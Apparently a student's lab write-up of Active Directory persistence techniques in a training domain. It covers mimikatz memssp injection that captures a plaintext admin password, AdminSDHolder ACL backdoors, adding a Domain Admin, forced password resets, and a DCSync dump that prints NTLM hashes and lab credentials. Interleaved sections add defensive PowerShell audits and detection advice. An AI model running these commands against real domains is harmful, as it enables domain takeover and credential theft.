# Learning Objective - 12

## Custom SSP

```
PS C:\AD\Tools> Invoke-Mimikatz -Command '"misc::memssp"' -ComputerName dcorp-dc

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # misc::memssp
Injected =)

PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy

PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006d82d7] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006db07e] dcorp\Administrator *DollarMakesEveryoneHappy

```
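As a defender-side counterpart to the SSP abuse shown above, the following PowerShell check (added here, not part of the original notes or of mimikatz) looks on a host for the artifacts such an SSP leaves behind: a non-baseline entry in the LSA `Security Packages` values (DLL-based SSP persistence), the `mimilsa.log` file that `memssp` writes into System32, and recent Security event 4622 entries. The `$expectedPackages` baseline is an assumption and must be verified against a clean build of the same Windows version; the script assumes it runs locally with administrative rights.

```powershell
# Added defensive check (not part of the original notes): look on a host, normally a
# domain controller, for the artifacts that a malicious SSP leaves behind.
# Assumptions: runs locally with administrative rights; $expectedPackages is a baseline
# that must be verified against a clean build of the same Windows version.
$lsaKey      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$osConfigKey = "$lsaKey\OSConfig"
$expectedPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')

function Get-UnexpectedSecurityPackage {
    # A DLL-based SSP persists through the 'Security Packages' multi-string value; memssp,
    # as used above, patches LSASS in memory instead and leaves these values untouched,
    # so a clean result here does not rule it out.
    foreach ($key in @($lsaKey, $osConfigKey)) {
        $values = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($pkg in @($values)) {
            if ([string]::IsNullOrWhiteSpace($pkg)) { continue }
            if ($pkg.ToLower() -notin $expectedPackages) {
                [pscustomobject]@{
                    Key       = $key
                    Package   = $pkg
                    DllExists = Test-Path (Join-Path "$env:SystemRoot\System32" "$pkg.dll")
                }
            }
        }
    }
}

function Get-MemsspLogArtifact {
    # memssp writes captured plaintext logons to System32\mimilsa.log, as shown above.
    # Only metadata is reported: the file itself contains credentials and must be handled as such.
    $log = Join-Path "$env:SystemRoot\System32" 'mimilsa.log'
    if (Test-Path $log) {
        $item = Get-Item $log
        [pscustomobject]@{
            Path          = $item.FullName
            LastWriteTime = $item.LastWriteTime
            Lines         = (Get-Content $log | Measure-Object -Line).Lines
        }
    }
}

function Get-RecentSecurityPackageLoad {
    # Security event 4622 is written when LSA loads a security package (requires the
    # "Security System Extension" audit subcategory). A package name outside the baseline
    # corroborates a registry finding.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4622 } -MaxEvents 50 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'Package'; e = {
            if ($_.Message -match 'Security Package Name:\s*(\S+)') { $Matches[1] } } }
}

"== Security packages outside the baseline =="
Get-UnexpectedSecurityPackage | Format-Table -AutoSize
"== mimilsa.log =="
$artifact = Get-MemsspLogArtifact
if ($artifact) { $artifact | Format-List } else { 'not present' }
"== Recent 4622 (security package loaded) events =="
Get-RecentSecurityPackageLoad | Format-Table -AutoSize
```

Because `memssp` lives only in LSASS memory, the durable signal for that variant is the log file and LSASS process-access telemetry (for example Sysmon event 10 against `lsass.exe`), not the registry; a reboot clears the in-memory patch but not the log.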

## AdminSDHolder

```
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student723 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
PS C:\AD\Tools>
```

This is visible in BloodHound:

<figure><img src="/files/aCmFzC2tF76eQS9ijf6l" alt=""><figcaption></figcaption></figure>

```
PS C:\AD\Tools> . .\Invoke-SDPropagator.ps1
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator
```

### Adding a user as Domain Admin

We verify our permissions:

```
PS C:\ad\tools> . .\PowerView.ps1
PS C:\ad\tools> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student723"}


AceType               : AccessAllowed
ObjectDN              : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed
IdentityName          : dcorp\student723
```

We verify that the user testda is not a Domain Admin.

```
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.

User name                    testda
Full Name                    test da
Comment                      Not what the name implies ;)
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/14/2022 9:06:38 AM
Password expires             Never
Password changeable          11/15/2022 9:06:38 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.
```

Now we add it.

```
PS C:\ad\tools> Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
VERBOSE: [Add-DomainGroupMember] Adding member 'testda' to group 'Domain Admins'
```

We check again.

```
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.

User name                    testda
Full Name                    test da
Comment                      Not what the name implies ;)
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/14/2022 9:06:38 AM
Password expires             Never
Password changeable          11/15/2022 9:06:38 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Admins        *Domain Users
The command completed successfully.
```

We can also remove users.

```
PS C:\ad\tools> Remove-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
VERBOSE: [Remove-DomainGroupMember] Removing member 'testda' from group 'Domain Admins'
True
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.

User name                    testda
Full Name                    test da
Comment                      Not what the name implies ;)
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/14/2022 9:06:38 AM
Password expires             Never
Password changeable          11/15/2022 9:06:38 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.
```

### Forcing a password change

We add the password-reset permission.

```
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student723 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
'ResetPassword' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
```

We run Invoke-SDPropagator to apply the changes immediately.

```
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator
```

We verify the permissions:

```
PS C:\ad\tools> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student723"}


AceQualifier           : AccessAllowed
ObjectDN               : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Force-Change-Password
ObjectSID              : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0
IdentityName           : dcorp\student723

```

Attempting to reset the password:

```
PS C:\ad\tools> Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Bromita123!" -AsPlainText -Force) -Verbose
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'testda'
VERBOSE: [Set-DomainUserPassword] Password for user 'testda' successfully reset
```

Based on what was observed in these tests, it is recommended not to handle more than one permission per ACL on AdminSDHolder.
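The checks above look for one known principal (`student723`). The following audit, added here and not part of the original notes or of PowerView, turns that into a defender-side routine: it reports every ACE on AdminSDHolder and on the default protected groups whose trustee is outside a baseline allow-list, and marks which of the group ACEs match one on AdminSDHolder (the sign that SDProp has already propagated them, as `Invoke-SDPropagator` did above). It assumes PowerView.ps1 is dot-sourced as elsewhere in these notes, and the `$baselineTrustees` list is an assumption that must be verified against a known-clean domain.

```powershell
# Added defensive audit (not part of the original notes): report ACEs on AdminSDHolder and on
# the groups it protects whose trustee is outside a baseline allow-list, and mark which of the
# group ACEs were propagated from AdminSDHolder by SDProp.
# Assumptions: PowerView.ps1 is dot-sourced as elsewhere in these notes, the account running
# this can read the ACLs, and $baselineTrustees has been verified against a known-clean domain.
. .\PowerView.ps1

$domainDn        = 'DC=' + ((Get-Domain).Name -replace '\.', ',DC=')
$adminSdHolderDn = "CN=AdminSDHolder,CN=System,$domainDn"

# Trustees that normally appear on AdminSDHolder (assumed baseline, compared by short name).
$baselineTrustees = @(
    'SYSTEM', 'SELF', 'Administrators', 'Domain Admins', 'Enterprise Admins',
    'Authenticated Users', 'ENTERPRISE DOMAIN CONTROLLERS',
    'Pre-Windows 2000 Compatible Access', 'Windows Authorization Access Group',
    'Terminal Server License Servers', 'Cert Publishers'
)

# Groups whose ACL SDProp overwrites from AdminSDHolder (default protected groups).
$protectedGroups = @(
    'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators',
    'Account Operators', 'Server Operators', 'Backup Operators', 'Print Operators'
)

function Get-NonBaselineAce {
    param([string]$Identity)
    Get-DomainObjectAcl -Identity $Identity -ResolveGUIDs |
        Where-Object { $_.AceType -match '^AccessAllowed' } |
        ForEach-Object {
            $trustee = Convert-SidToName $_.SecurityIdentifier
            [pscustomobject]@{
                ObjectDN    = $_.ObjectDN
                Trustee     = $trustee
                Rights      = $_.ActiveDirectoryRights
                ObjectType  = $_.ObjectAceType      # e.g. User-Force-Change-Password, as seen above
                IsInherited = $_.IsInherited
            }
        } |
        Where-Object { ($_.Trustee -replace '^.*\\', '') -notin $baselineTrustees }
}

$holderFindings = @(Get-NonBaselineAce -Identity $adminSdHolderDn)

$groupFindings = foreach ($group in $protectedGroups) {
    Get-NonBaselineAce -Identity $group | ForEach-Object {
        $ace = $_
        # Same trustee, rights and object type on AdminSDHolder means SDProp copied it down.
        $fromHolder = [bool]($holderFindings | Where-Object {
            $_.Trustee -eq $ace.Trustee -and
            "$($_.Rights)" -eq "$($ace.Rights)" -and
            "$($_.ObjectType)" -eq "$($ace.ObjectType)"
        })
        $ace | Add-Member NoteProperty 'PropagatedFromAdminSDHolder' $fromHolder -PassThru
    }
}

"== Non-baseline ACEs on AdminSDHolder =="
$holderFindings | Format-Table Trustee, Rights, ObjectType, IsInherited -AutoSize
"== Non-baseline ACEs on protected groups =="
$groupFindings | Format-Table ObjectDN, Trustee, Rights, ObjectType, PropagatedFromAdminSDHolder -AutoSize
```

A finding that appears on a protected group but not on AdminSDHolder is either a direct edit of the group (which SDProp will overwrite within its cycle) or a trustee that was removed from AdminSDHolder after propagation; both are worth a look at the 5136 (directory object modified) events for the object.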

## Rights Abuse

We check whether the user can perform DCSync.

```
$ crackmapexec smb 172.16.2.1 -u student723 -p 'hT3qDFRHGzVpJtym' --ntds
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym 
SMB         172.16.2.1      445    DCORP-DC         [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.2.1      445    DCORP-DC         [-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.

```

Then we assign the permissions:

```
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student723 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (&(|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on DC=dollarcorp,DC=moneycorp,DC=local
```

The assigned permission can be verified in BloodHound.

<figure><img src="/files/Nk12trc8eQYt2O3KiIM7" alt=""><figcaption></figcaption></figure>

We try DCSync again.

```
$ crackmapexec smb 172.16.2.1 -u student723 -p 'hT3qDFRHGzVpJtym' --ntds
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym 
SMB         172.16.2.1      445    DCORP-DC         [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.2.1      445    DCORP-DC         Administrator:500:aad3b435b51404eeaad3b435b51404ee:af0686cc0ca8f04df42210c9ac980760:::
SMB         172.16.2.1      445    DCORP-DC         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.2.1      445    DCORP-DC         krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e9815869d2090ccfca61c1fe0d23986:::
SMB         172.16.2.1      445    DCORP-DC         sqladmin\sqladmin:1113:aad3b435b51404eeaad3b435b51404ee:07e8be316e3da9a042a9cb681df19bf5:::
SMB         172.16.2.1      445    DCORP-DC         websvc\websvc:1114:aad3b435b51404eeaad3b435b51404ee:cc098f204c5887eaa8253e7c2749156f:::
SMB         172.16.2.1      445    DCORP-DC         srvadmin\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:a98e18228819e8eec3dfa33cb68b0728:::
SMB         172.16.2.1      445    DCORP-DC         appadmin\appadmin:1117:aad3b435b51404eeaad3b435b51404ee:d549831a955fee51a43c83efb3928fa7:::
SMB         172.16.2.1      445    DCORP-DC         svcadmin\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB         172.16.2.1      445    DCORP-DC         testda\testda:1119:aad3b435b51404eeaad3b435b51404ee:a16452f790729fa34e8f3a08f234a82c:::
SMB         172.16.2.1      445    DCORP-DC         mgmtadmin\mgmtadmin:1120:aad3b435b51404eeaad3b435b51404ee:95e2cd7ff77379e34c6e46265e75d754:::
```

Just as all rights were granted on the domain object, rights can also be granted specifically for DCSync:

{% code overflow="wrap" %}

```
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student723 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
```

{% endcode %}
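The two grants above (`-Rights All` and `-Rights DCSync`) both end up as ACEs on the domain head, which is where a defender should look. The following audit is added here and is not part of the original notes or of PowerView: it lists every trustee on the domain object that holds one of the three replication extended rights, all extended rights, or a right that would let it grant itself one (GenericAll, WriteDacl, WriteOwner), and separates out those not in a baseline list. It assumes PowerView.ps1 is dot-sourced as elsewhere in these notes; the `$baselineTrustees` list is an assumption to verify against a known-clean domain.

```powershell
# Added defensive audit (not part of the original notes): list who holds replication
# (DCSync-capable) rights, or rights that allow granting them, on the domain head.
# Assumptions: PowerView.ps1 is dot-sourced as elsewhere in these notes, and the
# baseline list below matches what a default domain grants (verify before use).
. .\PowerView.ps1

$domainDn = 'DC=' + ((Get-Domain).Name -replace '\.', ',DC=')

# Extended rights that together make DCSync possible.
$replicationRights = @(
    'DS-Replication-Get-Changes',
    'DS-Replication-Get-Changes-All',
    'DS-Replication-Get-Changes-In-Filtered-Set'
)

# Trustees that hold these rights by default (assumed baseline, short names).
$baselineTrustees = @(
    'SYSTEM', 'Administrators', 'Domain Controllers',
    'ENTERPRISE DOMAIN CONTROLLERS', 'Enterprise Read-only Domain Controllers',
    'Domain Admins', 'Enterprise Admins'
)

function Get-DcSyncCapableAce {
    Get-DomainObjectAcl -Identity $domainDn -ResolveGUIDs |
        Where-Object { $_.AceType -match '^AccessAllowed' } |
        Where-Object {
            $rights = "$($_.ActiveDirectoryRights)"
            # An explicit replication right, an ACE covering every extended right
            # (ExtendedRight with no object type), or a right that lets the trustee grant
            # itself one (GenericAll, as with -Rights All above, WriteDacl, WriteOwner).
            ($_.ObjectAceType -in $replicationRights) -or
            ($rights -match 'ExtendedRight' -and -not $_.ObjectAceType) -or
            ($rights -match 'GenericAll|WriteDacl|WriteOwner')
        } |
        Select-Object @{ n = 'Trustee'; e = { Convert-SidToName $_.SecurityIdentifier } },
                      @{ n = 'Right';   e = { if ($_.ObjectAceType) { $_.ObjectAceType } else { $_.ActiveDirectoryRights } } },
                      IsInherited
}

$aces       = @(Get-DcSyncCapableAce)
$unexpected = $aces | Where-Object { ($_.Trustee -replace '^.*\\', '') -notin $baselineTrustees }

"== All DCSync-capable trustees on $domainDn =="
$aces | Sort-Object Trustee | Format-Table -AutoSize
"== Not in baseline (review each one) =="
$unexpected | Format-Table -AutoSize
```

Some non-default trustees are legitimate (an Azure AD Connect synchronisation account is the usual one), so review before removing. For ongoing detection, Security event 4662 on the domain object with the replication right GUIDs from an account that is not a domain controller is the signal that a DCSync actually ran, and event 5136 on the domain head records the ACL change that granted the right.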
